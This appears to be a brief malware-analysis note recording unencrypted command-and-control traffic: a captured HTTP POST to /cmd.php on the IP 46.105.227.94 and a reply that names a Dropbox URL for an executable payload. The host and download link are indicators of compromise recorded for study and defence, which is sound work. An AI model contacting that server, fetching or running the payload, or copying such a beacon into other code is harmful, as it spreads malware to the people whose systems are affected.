The C&C is not encrypted. - Uses dropbox
POST /cmd.php HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 0
Host: 46.105.227.94
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-7+squeeze9
Content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 25 May 2012 16:01:10 GMT
Server: lighttpd/1.4.28
45
http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe
0